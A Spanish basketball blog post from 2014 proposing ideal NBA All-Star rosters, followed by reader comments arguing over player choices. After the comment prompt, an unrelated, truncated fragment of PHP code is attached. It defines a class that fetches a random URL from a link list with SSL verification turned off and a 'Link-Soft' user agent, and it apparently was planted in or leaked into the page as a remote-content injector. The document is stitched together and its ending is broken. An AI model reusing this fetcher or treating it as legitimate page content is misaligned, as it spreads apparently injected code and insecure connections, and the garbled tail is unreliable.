Los All-Star de TJNBA

27 de January de 2014 por TheDeerHunter

Conocidos los quintetos titulares para el próximo All-Star Game de New Orleans procedemos a aventurar lo que desde nuestro punto de vista podría ser la selección ideal. No nos ha gustado la idea de separar el voto entre frontcourt y backcourt, y la consecuencia más visible: el juego interior de small forwards con el que se va a presentar el Este. Por otro lado excluiremos de nuestra lista a jugadores que vienen sufriendo problemas físicos de cierta magnitud. Aunque llegaran en condicions al evento, de trata de un fin de semana perfecto para descansar y recuperarse. No olvidemos que al final lo importante es la competición.

OESTE

Titulares

Stephen Curry: Si Chris Paul estuviera sano habría que reconocer que esta elección sería como mínimo discutible  teniendo en cuenta los méritos de cada uno. No obstante uno no puede ser totalmente objetivo y “El artista” es una de nuestras debilidades. Mi voto hubiera sido en cualquier caso para él. Sobra decir lo desequilibrante que puede llegar a ser cuando fluye el baloncesto por sus venas y lo bien que le pega la naturaleza de este evento.

James Harden: Podemos llegar a entender la votación a Kobe desde un punto de vista honorífico pero no hace falta ser un lince para darse cuenta de quién viene siendo el mejor escolta de la conferencia este año. No está brillando tanto como la temporada pasada pero casi, y sin Kobe, lógicamente, la competencia es menor. En cualquier caso es de esperar que termine saliendo de titular.

Kevin Durant: Al nivel que está va camino de arrasar en la carrera por el MVP, al nivel de los mejores espadas de todos los tiempos. Brillando más que nunca para disimular casi por completo la ausencia de un monstruo como Westbrook. Poco más que añadir. Si hay una elección que debe ser indiscutible es esta.

Blake Griffin: Si alguien tenía alguna duda sobre la realidad de Griffin la ausencia de Chris Paul debería resolverla. Podríamos discutir a quién se prefiere, “a papá o a mamá”, pero con el detalle del balance de su equipo la elección es esencialmente justa… siempre que LaMarcus Aldridge también sea incluido dentro del quinteto. 

LaMarcus Aldridge: Siendo puristas muchos optarían por un pívot nato para esta selección aunque el bueno de LaMarcus ha defendido la posición en más de una ocasión. Curiosamente ni el cambio en el criterio de votación ha abierto las puertas al mejor interior del año y el único que se mantiene vivo en la carrera por el MVP. La competencia en su posición es atroz pero todo lo que no sea elegirle a él tiene un punto importante de injusticia.

Reservas

Kevin Love: El curso de Love, individualmente hablando, vuelve a ser extraordinario. Sin embargo, cada día suenan más voces que cuestionan el impacto real de sus números en el juego así como su nivel defensivo. Quizá todo sea culpa de la mala imagen que están dejando colectivamente sus Wolves. Es un detalle que no le beneficia.

DeMarcus Cousins: No habíamos visto hacer según que cosas a un pívot desde Shaquille. El talento de este hombre es indescriptible y su techo desconocido. La duda es si lograremos verle centrado alguna vez para aspirar a objetivos serios pero para disputar un all-star va sobradísimo.

Dwight Howard: Quizá “Supermán” ya no deslumbra como antaño pero sigue siendo un interior desequilibrante. Además, su presencia siempre suele dar mucho juego en este tipo de eventos.

Goran Dragic: Increíble el curso del esloveno. Máximo exponente de la sensación que está causando su equipo. Se le despeja mucho el camino gracias a numerosas bajas (incluida, quizá, la de su compañero Bledsoe) pero posee el nivel All-Star requerido y sería altamente injusto no incluir a algún representante de los Suns. Uno de los grandes olvidados en la votación popular.

Ty Lawson: Otro olvidado. Sólo CP3 y Curry asisten más que él en esta liga. No le ha beneficiado la irregular temporada de los Nuggets, espejo en más de una ocasión de su rendimiento, pero si aún se mantienen en la pomada es en buena medida por su culpa.

Nicolas Batum: Olvidado también, una constante cuando se habla de un jugador de los Blazers. El All-Star ya se le escapó por los pelos el año pasado. El rendimiento colectivo de su equipo en el que él hace de pegamento debe suponer una ventaja. Hace tiempo que es uno de los mejores jugadores de perímetro de la liga y este curso está ofreciendo el baloncesto más inteligente de su carrera.

Tim Duncan: Sería imperdonable que no fuera ningún representante de los Spurs, por mucho carácter colectivo que tenga este equipo. Quedaron atrás sus mejores años (aunque no tan atrás, no olvidemos) y la competencia es brutal, pero estando sano y mínimamente productivo no se puede entender una elección de los mejores sin el mejor de la historia en su posición.

ESTE

Titulares

John Wall: En un mundo ideal debería tener algún mérito tener a un equipo como Washington cómodamente instalado en zona de playoffs prácticamente durante todo el curso. Wall está siendo el mejor base de la conferencia de largo. Resulta inexplicable que no se le haya tenido en cuenta como tal.

DeMar DeRozan: Tres cuartos de lo mismo, aunque en este caso aún podemos digerir algo mejor la presencia de Wade por lo que  su figura aún representa. Tras la salida de Gay, DeRozan ha dado una paso adelante de los gordos, con unos resultados que saltan a la vista. A Wade, por su parte, le dejaríamos reposando de sus dolencias.

Paul George: Incuestionable. Temporada soñada en todos los aspectos. El único que ha resistido el aluvión de votos a Durant y LeBron… Quizá lo único que se aproxima a la realidad en la sabiduría popular.

LeBron James: No gusta a los puristas que se le considere “interior” pero verle en el salto inicial va a resultar grotesco para muchos. Por lo demás es indiscutible que debe de ser titular. Además, es el más votado y esto también refleja fielmente su estatus de hombre a batir.

Joakim Noah: El francés llega de tapado este año. Quizá no está destacando tanto como en años anteriores pero si observamos más detenidamente veremos lo extraordinario de su curso, otra vez en circunstancias muy difíciles. Personalmente creo que es el pívot más inteligente de la conferencia, potencialmente inferior a Hibbert y Drummond pero en la práctica un punto superior a estos… Al menos de momento.

Reservas

Carmelo Anthony: Nadie duda de la clase de Carmelo como tampoco de su estatus All-Star. Quizá sí del impacto de su juego, en una situación colectiva muy desagradable, además. Nos oponemos a llenar un quinteto de aleros por muy buenos que estos sean. En la teórica disputa frente a LeBron y Paul George parece evidente quien sale perdiendo.

Kyrie Irving: A una de las grandes decepciones del año se le da como premio la titularidad en el All-Star. No lo vemos. Tampoco dudamos del talento del susodicho pero parece claro que su alta aportación numérica no tiene como resultado un chaparrón de victorias para un equipo al que muchos dábamos como fijo para postemporada. Si nos ponemos a pensar un poco igual encontramos razones para que viera el evento por la TV. En cualquier caso Irving ha nacido para este tipo de espectáculos.

Aarron Afflalo: Temporada excelente la del escolta de Orlando. Sin embargo su equipo se ha lanzado descaradamente al tankeo por lo que ha perdido puntos. Estando Wade completamente sano habría que tomar la difícil decisión de dejarle fuera.

Paul Millsap: Hacer olvidar a Horford no resulta nada fácil. Millsap ha elevado su nivel y está liderando un buen equipo de playoffs, sin su tradicional líder. Tiene mucho mérito y no debemos ignorarlo.

Al Jefferson: El nivel que ha enganchado Jefferson, especialmente durante las últimas semanas, sumado a la actual situación del equipo le hacen prácticamente indiscutible. Quizá éste podría ser el año de su estreno.

Andre Drummond: Una bestia parda a la que el balance de su equipo tampoco favorece. Si mencionaramos aquí a Hibbert tampoco pasaría nada pero la temporada del center titular de Detroit se antoja más brillante individualmente hablando.

Lance Stephenson: Decisión muy personal que entiendo perfectamente que sea discutida. En realidad no existe ninguna razón objetiva para elegirle en detrimento de otros como Lowry, Bosh o su compañero Hibbert. Me parece justificable tener dos miembros de los Pacers en la lista, y su versatilidad así como su tendencia al espectáculo me animan a incluirle en ella. Imagino que con él la diversión está asegurada.

Comenta

25 comentarios a esta entrada

  1. rumbero dice:
    #1

    Para lo subjetivo que suele ser esto, os los compro casi todos. Donde puede haber más debate es en el backcourt del oeste, pero es que hay un overbooking de jugones importante. Estamos dejando fuera a Kobe, Paul y Westbrook por lesión y aún así se podría meter a Parker, Conley o Lillard como reservas y no pasaría nada. Al que si que pondría (no se nos vaya a enfadar a Esteban) es a Anthony Davis sin dudarlo.

    En el este pondría a Wade cojo de titular (aunque habría que llevar a DeRozan o Lowry como representantes de los Raptors) y no concibo que no vaya Hibbert. Se os va a enfadar Prokhorov por no poner a nadie de los Nets con la pasta que se ha dejado.

      Citar

  2. Jose Luis dice:
    #2

    A mi lo de Wall de base titular me parece bastante subjetivo… los Wizards no son nada mancos para lo que es el Este, y Wall me parece más el problema que el clavo al que agarrarse.

    Mi 5 del Oeste: Curry – Lillard – Durant – Aldridge – Cousins, aunque admito a Love o Griffin por el record, y quitar a Cousins.

    Mi 5 del Este: Lowry – Stephenson – George – James – Drummond, aunque admito a Noah o Hibbert por el récord y quitar a Drummond.

      Citar

  3. melo15 dice:
    #3

    Pero CP3 si va allegar al all-star no? Porque si llega seria un fijo. Yo cambiaria a a Dragic y a Lawson por CP3 y Lillard.
    Como 3 all-stars de Portland serian demasiados quitaria a Batum, que esta haciendo muy buena temporada pero no es una estrella y pondria a Parker.
    En el Este quitaria a Drummon (ningun Piston se merece ir al all-star) y pondria a Hibbert, Afflalo por Wade y a Joe Johnson por Stephenson. Stephenson me parece un jugadorazo y creo que ira en los años succesivos, pero seguramente los Nets esten arriva de la Conferencia Este para el all-star y el que tiene mas culpa es JoJo.

      Citar

  4. melo15 dice:
    #4

    Ya defendi a Wall en otro post pero me parece increible lo infravalorado que esta en este blog.
    En mi opinion Wall esta haciendo una temporada muy buena, el unico fallo es quizas el bajo acierto, pero en todos los otros aspectos se esta saliendo. Desde luego mejor temporada que Deron, Irvinf y Lowry (que hace dos semanas que juega bien)

      Citar

  5. Esteban dice:
    #5

    no es por meter ficha y reconozco que este Griffin es mejor que el del año pasado, no comparto la idea de poner a dos power fowars o 3 aleros o 4 bases

    sin dudas el 4 del oeste es Aldrigue, y el 5 Cousins o Howard, como que en el este Hibbert o Noah deberian estar

      Citar

  6. Denise dice:
    #6

    En general, me gusta, aunque retocaría el equipo.
    Por supuesto metería a Paul de titular en el Oeste, y Curry en lugar de Lawson. El de Denver está haciendo un temporadón, pero lo siento, hay mucho nivel en esta conferencia.
    Y aunque me encanta desde siempre el alero francés, pondría a Lillard en lugar de Batum.

    En el este, pondría a Michael Carter-Williams de titular, mucho merito el del rookie con esas grandes actuaciones individuales y grandisima temporada la que están haciendo los 76ers a pesar de la plantilla de chiste que tienen.
    En la suplencia, estaría Wall y quitaría a Irving, el de los Cavs para mí está jugando peor que en años anteriores.
    A Hibbert lo pondría de titular mucho antes que a Noah.
    Y a Paul Millsap no lo llevaría, su temporada es buena, pero su nivel excelente solo es desde la lesión de Horford, antes de eso, eran el dominicano y Korver los que estaban tirando del carro. En su lugar, llevaría a Kemba Walker ó a Luol Deng.

      Citar

  7. Jose Luis dice:
    #7

    A mi los números de wall me dicen poco.

    20 puntos, 42% T2, 32%T3, 8.5 asistencias con 4 pérdidas por partido, y el hecho de que teniendo un equipo que debería ir 3º, lo tiene 6º por detrás de unos Hawks sin Horford o unos Raptors… 29 partidos vs equipos del este y han ganado 17, psche.

    El blog si lo valora parece, lo meten en el all-star. A mi Wall me dice muy poquito, y Lowry me dice bastante más que él.

      Citar

  8. TheDeerHunter dice:
    #8

    Lowry lo está haciendo peor en todo que Wall. Menos puntos, menos asistencias, menos robos, similares porcentajes de acierto. En cualquier caso en Lowry también pensé, pero al final me decidí por Stephenson.

    Y Millsap puede que haya alcanzado a la excelencia tras la baja de Horford, pero es que ya ha alcanzado el nivel del dominicano y para mí Horford sano hubiera sido un fijo. Por coherencia Millsap también debe de ir. Para mí por delante de Drummond o Hibbert, por ejemplo.

    Del resto comentar que también pensé mucho en Lillard, en Anthony Davis, Hibbert… sin embargo no consideré ni a Parker, ni a JoJo. Sobre todo con el francés no soy sospechoso, siempre me ha encantado. Sin embargo yo creo que no están brillando a su nivel habitual este curso. Joe Johnson me parece que hace tiempo que dejó de hacerlo y sólo destaca ocasionalmente.

      Citar

  9. Chipi dice:
    #9

    Todo esto es pensando que CP3 no llegue. Si llega, se cae Dragic. Y quitaría a Lawson y Batum para meter a Lillard y David Lee (no lo puedo defender con estadísticas, pero como esto es subjetivo, no voy a dejar fuera a uno de mis jugadores favoritos…).

    En el Este, George, LeBron y Carmelo tienen que ser titulares sí o sí. DeRozan suplente. Y Afflalo se iría a su casa a aprender un poco de Wade. Puede que también quitase a Irving y metiese a Carter-Williams.

      Citar

  10. Denise dice:
    #10

    Chipi:
    Y Afflalo se iría a su casa a aprender un poco de Wade.

    Pero al hacer la selección, en que pensais ¿en el nombre y en el global de la carrera del jugador ó la presente temporada en si?
    Porque si es por la actual temporada, Afflalo está jugando 100 veces mejor que un Wade bastante mermado físicamente y muy a la sombra de Lebron y hasta de Bosh ultimamente.

      Citar

  11. rumbero dice:
    #11

    Denise: Pero al hacer la selección, en que pensais ¿en el nombre y en el global de la carrera del jugador ó la presente temporada en si?
    Porque si es por la actual temporada, Afflalo está jugando 100 veces mejor que un Wade bastante mermado físicamente y muy a la sombra de Lebron y hasta de Bosh ultimamente.

    Pero es que este Wade que tiene que descansar cada 4 partidos está casi en los mismo número que Afflalo o DeRozan (y jugando menos minutos). Que la temporada de estos dos está muy bien, pero hace tiempo que parece que Wade está de comparsa en Miami y sin él no se llevan dos anillos ni en pintura. Balance de los Heat esta temporada sin él: 7-6

      Citar

  12. Denise dice:
    #12

    rumbero: Pero es que este Wade que tiene que descansar cada 4 partidos está casi en los mismo número que Afflalo o DeRozan (y jugando menos minutos). Que la temporada de estos dos está muy bien, pero hace tiempo que parece que Wade está de comparsa en Miami y sin él no se llevan dos anillos ni en pintura. Balance de los Heat esta temporada sin él: 7-6

    Que si, y seguramente irá al All-Star, pero tu lo has dicho, para jugar bien tiene que estar dosificándose y mucho.
    Lo del balance, lo siento pero no me dice nada, siempre que un jugador importante se pierde partidos, su equipo lo nota y pierde más partidos de la cuenta. Es algo tan matemático.

      Citar

  13. rumbero dice:
    #13

    Denise: Que si, y seguramente irá al All-Star, pero tu lo has dicho, para jugar bien tiene que estar dosificándose y mucho.
    Lo del balance, lo siento pero no me dice nada, siempre que un jugador importante se pierde partidos, su equipo lo nota y pierde más partidos de la cuenta. Es algo tan matemático.

    Pero es que lo del balance venía por el comentario de que está muy a la sombra de Lebron e incluso Bosh. Si lo tienes por un jugador importante (fundamental diría yo) entonces Ok.
    Yo con esto del All Star intento guiarme siempre por la temporada, aunque a veces cueste no tirar de trayectoria, pero en el caso de Wade es realmente porque me parece mejor jugador a día de hoy que el resto de escoltas del este. En ese sentido, está el caso de Dirk. Nadie lo ha nombrado aún y eso es pecado, pero pese a que está haciendo una temporada hay mucho 4 bueno en el oeste.

      Citar

  14. TheDeerHunter dice:
    #14

    A mí me parece que el hecho de que Wade deba dosificarse tan “a lo bestia” es razón suficiente para que no vaya. Teniendo en cuenta el nivel de tantos jugadores que seguro se van a quedar fuera. Su temporada es notable cuando ha jugado, pero me parece más destacable y más meritorio brillar en Toronto u Orlando que en el vigente campeón.

    Sobre Chris Paul, si llega disponible lógicamente es un fijo, pero de ir pienso que debería caerse Lawson y no Dragic.

    Ha llamado mucho la atención que “nos hayamos olvidado” de Anthony Davis. La temporada que está haciendo certifica su nivel all-star… pero es que vaya competencia. En ningún caso creo que merezca ir por delante de Aldridge, Griffin y Love. Y ya son 3 que comparten posición con él y que bajo mi punto de vista le superan hoy por hoy. ¿Por delante de Cousins? Ahí andará… ¿Dejar fuera a Howard? Igual sí, pero es que creo que realmente no debería jugarse el puesto con ellos.
    Supongo que el que más papeletas podría tener con los fríos números en la mano sería Duncan… pero esa decisión no la podría tomar yo. Y dejar a los Spurs sin representación menos todavía.

    En el oeste hay mucha tralla por dentro. Se va a quedar gente fuera como David Lee… y alguno más que podríamos meter en las quinielas. Todos esos interiores no caben en las 6-7 plazas que hay disponibles. ¿Qué le vas a hacer?
    En cualquier caso es perfectamente entendible que al final entre y se caiga alguno que hemos elegido nosotros.

      Citar

  15. Denise dice:
    #15

    Y Deer, no crees que Carter-Williams debería ir al All-Star? Para mi se lo merece mas que ningún otro base del Este

      Citar

  16. TheDeerHunter dice:
    #16

    Denise:
    Y Deer, no crees que Carter-Williams debería ir al All-Star? Para mi se lo merece mas que ningún otro base del Este

    Pues si te he de ser sincero no pensé en esa posibilidad.
    La impresión que tenía es que estaba brillando algo irregularmente y además los Sixers parecen definitivamente descolgados y no me había fijado demasiado en él.
    No cabe duda que está haciendo una campaña increíble. Más bestia de lo que pensaba, porque tras la lesión de diciembre me parecía que no había brillado tanto.

    Si no está para ir está muy cerca. Para simplificarlo un poco tanto Irving, como Wall, como Lowry están por encima de 20 de PER y él se queda en un 17.5 supongo que por culpa de ese 40% raspado, pero vamos que los otros tampoco estén finísimos mirando aro. A Stephenson le he metido con no llega a 16, así que perfectamente podría ir en su lugar… aunque hoy te diría que antes metería a Lowry. Igual mañana te digo lo contrario.

      Citar

  17. Denise dice:
    #17

    TheDeerHunter:
    Si no está para ir está muy cerca. Para simplificarlo un poco tanto Irving, como Wall, como Lowry están por encima de 20 de PER y él se queda en un 17.5 supongo que por culpa de ese 40% raspado, pero vamos que los otros tampoco estén finísimos mirando aro. A Stephenson le he metido con no llega a 16, así que perfectamente podría ir en su lugar… aunque hoy te diría que antes metería a Lowry. Igual mañana te digo lo contrario.

    Bueno, si es por el PER, éste método me parece tan poco fiable como el +/- en cancha, porque la última vez que mire esta estadística hará como 20 días, el tercer mejor rookie por PER era Radujilca ó como se llame ese balcanico de los Bucks, y no creo que nadie en su sano juicio crea que a dia de hoy ese hombre está entre los 10 mejores rookies del año

      Citar

  18. TheDeerHunter dice:
    #18

    Hombre Denise, cualquier estadística queda distorisonada con un muestreo tan escaso, pero estamos hablando de jugadores que han disputado muchos minutos.
    En cualquier caso no pretendía abrir un debate sobre medición fiable de eficiencia. Simplemente digo que a simple vista parece un peldañito inferior a la de los otros tres.

      Citar

  19. Denise dice:
    #19

    TheDeerHunter:
    Hombre Denise, cualquier estadística queda distorisonada con un muestreo tan escaso, pero estamos hablando de jugadores que han disputado muchos minutos.
    En cualquier caso no pretendía abrir un debate sobre medición fiable de eficiencia. Simplemente digo que a simple vista parece un peldañito inferior a la de los otros tres.

    Ok, a todo esto, ¿cuando dicen de forma oficial los jugadores para el All-Star, y para los concursos de triples y mates? En el de mates, me gustaría ver a Oladipo.

      Citar

  20. Chipi dice:
    #20

    TheDeerHunter:

    Sobre Chris Paul, si llega disponible lógicamente es un fijo, pero de ir pienso que debería caerse Lawson y no Dragic.

    Evidentemente. A Lawson lo quito fijo para meter a Lillard y Dragic se caería si llega CP3. Pero vamos, que esto es un juego de basket-ficción. En realidad a mí me da bastante igual quién vaya. Sólo quiero ver a Curry.

    Sobre los criterios de elección, soy de la opinión de que no es del todo injusto que en cada jugador se aplique uno distinto, ya sea la temporada actual, la trayectoria u otros motivos.

    Sobre lo que dice Denise, ¿este año no hay votación para elegir los jugadores de los concursos?

      Citar

  21. rumbero dice:
    #21

    Chipi:
    Sobre lo que dice Denise, ¿este año no hay votación para elegir los jugadores de los concursos?

    ¿El año pasado fue así? No lo recuerdo la verdad. Si me suena que hace un par de años la gente votaba los mates por twitter y que la temporada pasada se sacaron de la manga eso de enfrentar conferencia este y oeste. Este año en cualquier caso no parece que vaya a haber votaciones.
    Del concurso de triples se han filtrado 5 posibles participantes: Irving, Love, Curry, Bellineli y Korver. Faltaría un sexto. Buena pinta tiene si van estos

      Citar

  22. Vader dice:
    #22

    Para los triples Teletovic estaria bien…

      Citar

  23. Ruxixon dice:
    #23

    JJ Redick debería ser un “must”

      Citar

  24. txusma dice:
    #24

    Hoopshype ha hecho una encuesta entre los jugadores de la NBA sobre los reservas del All-Star y estos son los resultados:

    – Este: John Wall, Lance Stephenson, Chris Bosh, Joe Johnson, DeMar DeRozan, Joakim Noah and Roy Hibbert.
    – Oeste: LaMarcus Aldridge, Damian Lillard, Chris Paul, Dwight Howard, Tony Parker, James Harden and Tim Duncan.

    Lo de Chris Bosh por encima de Al Jefferson o Paul Millsap canta y lo de Joe Johnson por encima de… cualquiera, tb. Eso sí, apuestan, como Deer por DeRozan y Stephenson. En el Oeste, ni Dragic, ni Batum, ni Lawson, ni Demarcus Cousins. Y tampoco Anthony Davis.

      Citar

  25. TheDeerHunter dice:
    #25

    Bosh está haciendo, diría, su mejor campaña en Miami… y se puede entender que se le nombre. Me cuesta más con Joe Johnson, dejando en casa a Afflalo… aunque bien es cierto que los Nets están en playoffs y quizá había que meter a alguien.

    En el Oeste, teniendo en cuenta que están Kobe y Paul, es más difícil ponernos de acuerdo. Pero bueno, observo cierto criterio por parte de ellos a pesar de tanta disparidad. Los jugadores parecen premiar especialmente aquellos equipos con presencia en playoffs.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>